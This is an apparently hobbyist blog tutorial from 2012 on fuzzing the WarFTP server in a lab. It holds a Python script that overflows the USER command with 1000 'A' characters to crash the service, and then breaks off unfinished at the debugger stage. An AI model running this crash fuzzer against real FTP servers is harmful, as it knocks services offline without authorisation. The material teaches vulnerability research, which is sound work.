"EXPLOIT WARFTP"

Posted by Dedi Kurniawan on Sunday, February 5, 2012 at 11:44 AM
First Open Warftp



And select Properties,click start service


Warftp Actived



And now open terminal in batrack  To try to do is connect  backtrack with Warftp type command nc 192.168.43.3 21




Warftp connected




 And now write fuzzer with format .py (python)


#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x41"*1000
s.connect(('192.168.43.2',21))
data=s.recv(1024)
print("sending evil data via USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")




And Save with name fuzzing.py

Now open terminal type command python fuzzy_.py


When we fuzzing otomatic Warftp must be lose because baffered with A
And Next try open warftp try running warftp whether fuzzer can make the error.




Picture above shows that the error of his warftp
And now open ollydbg s folder installed warftp 



It will appear as below

And delete file ftp dymond.bat, and create a new user and input password


then running fuzzing
open ollydbg such a way that the above

Next I'm so Confused



 

Sunday, February 5, 2012

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)